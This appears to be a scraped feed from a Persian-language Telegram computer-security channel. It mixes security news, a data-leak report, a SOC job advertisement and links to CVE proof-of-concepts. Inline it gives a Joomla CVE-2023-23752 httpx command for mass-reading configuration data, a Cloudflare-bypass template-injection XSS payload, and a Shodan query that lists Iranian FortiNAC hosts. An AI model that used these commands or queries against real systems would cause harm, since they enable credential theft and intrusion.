Apache SCXML Remote Code Execution
POC : https://pyn3rd.github.io/2023/02/06/Apache-SCXML-Remote-Code-Execution/
کانال آموزش کامپیوتر
@Engineer_Computer

https://tajrobe.github.io/
تجربه مصاحبه های کاری خودتونو در لین سایت ثبت کنید
کانال آموزش کامپیوتر
@Engineer_Computer

یک جزوه SOC
که بسیار کامل و خوب هست واقعا
مفید و سازنده
اميدوارم دوستان استفاده خوبی ازش بهره مند بشن
کانال آموزش کامپیوتر
@Engineer_Computer

DNS Security
کانال آموزش کامپیوتر
@Engineer_Computer

کانال آموزش کامپیوتر
@Engineer_Computer

#ESXI #Ransomware
کانال آموزش کامپیوتر
@Engineer_Computer

سایتای وردپرسی هیچوقت فراموش نکنید این تست رو :)
کانال آموزش کامپیوتر
@Engineer_Computer

شرکت مهندسی اوژن تدبیر پارس در راستای تکمیل تیم کارشناسان مرکز عملیات امنیت (لایه یک) در پروژه‌های جاری از افراد دارای مهارت های ذیل دعوت به همکاری می‌نماید.
توانایی‌های فنی:
• مسلط بر مفاهیم شبکه و امنیت
• آشنایی با لاگ تجهیزات امنیتی، شبکه‌ای، سیستم‌‌عامل و پایگاه داده
• آشنایی با Splunk
• آشنایی با فرآیندهای رسیدگی به رخداد
مهارت‌های عمومی:
• آشنایی با زبان انگلیسی در سطح خوب (ترجمه و درک مطلب فنی و تخصصی)
• دارای روحیه کار تیمی و تعامل پذیری
• دارای تعهد و انگیزه خدمت
ساعت کاری: شنبه تا چهارشنبه 8 تا 17
بیمه پایه + بیمه تکمیلی
نوع همکاری: تمام وقت

خواهشمند است در صورت تمایل رزومه خود را با عنوان "کارشناس SOC" به آدرس [email protected] ارسال نمایید.

#استخدام #همکاری #فرصت_همکاری


کانال آموزش کامپیوتر
@Engineer_Computer

اداره تحقیقات فدرال آمریکا هک شد!

🔹️اف بی آی مشغول تحقیق درباره هک شبکه رایانه خود است که البته اکنون مهار شده است.
🔹️این آژانس در بیانیه ای ایمیلی بدون اشاره به جزئیات بیشتر نوشت: اف بی آی از این رویداد آگاه و مشغول جمع آوری اطلاعات اضافی است.
🔹️شبکه خبری سی ان ان نخستین بار از هک اف بی آی خبر داد و اعلام کرد مقامات این سازمان فدرال آمریکا معتقدند رایانه های دفتر آن در نیویورک که برای تحقیق درباره سواستفاده از کودکان استفاده می شد، نیز هک شده اند.
البته هنوز مشخص نیست هک مذکور دقیقا چه زمانی رخ داده است. به گفته یک منبع آگاه منبع حمله هکری هنوز تحت بررسی است.


کانال آموزش کامپیوتر
@Engineer_Computer

Demonstrating RCE on Inductive Automation Ignition
https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization
کانال آموزش کامپیوتر
@Engineer_Computer

My Backache's Main Reason!
#FUN #FACT
کانال آموزش کامپیوتر
@Engineer_Computer

⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#joomla #0day
کانال آموزش کامپیوتر
@Engineer_Computer

احراز هویت دو مرحله‌ای توییتر دیگر رایگان نخواهد بود‌‌

١. از تاریخ ۲۹ اسفند دسترسی به احراز هویت دو مرحله‌ای از طریق پیامک تنها در اختیار مشترکین سرویس Blue قرار می‌گیرد. هزینه استفاده از این طرح در هر ماه برای دستگاه‌های اندرویدی، ۸ دلار و برای محصولات اپل، ۱۱ دلار خواهد بود.

کانال آموزش کامپیوتر
@Engineer_Computer

"Network Nightmare" Mindmap.

It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.

• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.

https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf

#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer

Cloudflare bypass & template injection to XSS in one shoot

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer

CVE-2023-23333 : SolarView Compact 6.00 - Remote Command Execution
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer

CVE-2022-39952
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
‏امنیت به تجهیزات شما نیست

https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR

‏اطلاعات بیشتر:

https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer

‏نشت جدید: اطلاعات بیش از 800 هزار کاربر ‎#پونیشا هم اکنون در خطر افشای عمومی. این داده‌ها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، تلفن همراه و اطلاعات دیگری از کاربران را شامل می‌شود. پونیشا قبلا هم دچار نشت داده شده بود. بیشتر بخوانید: https://wiki.leakfa.com/ponisha-new-leak
کانال آموزش کامپیوتر
Engineer_Computer

CVE-2023-0669 : GoAnywhere MFT < 7.1.2 - pre-authentication command injection
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer

نشت جدید: داده‌های بیش از 800 هزار کاربر "سایت فریلنسری ایرانی و کار آنلاین پونیشا" که بر روی یک Elasticsearch محافظت نشده قرار گرفته بود، هم اکنون در خطر افشای عمومی اطلاعات قرار گرفته‌اند. این داده‌ها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، شماره تلفن همراه، شهر، کشور، نوع حساب، نوع پروفایل، تصویر پروفایل، تصویر روی جلد پروفایل، رزومه، موقعیت شغلی، سوابق تحصیلی، دانشگاه محل تحصیل، مهارت ها و اطلاعات دیگری از کاربران را شامل می‌شوند. این‌سایت دوسال پیش و در حوالی این روزها نیز دچار نشت اطلاعات دیگری شده بود.

کانال آموزش کامپیوتر
Engineer_Computer

https://github.com/0xInfection/Awesome-WAF
چک لیست تست waf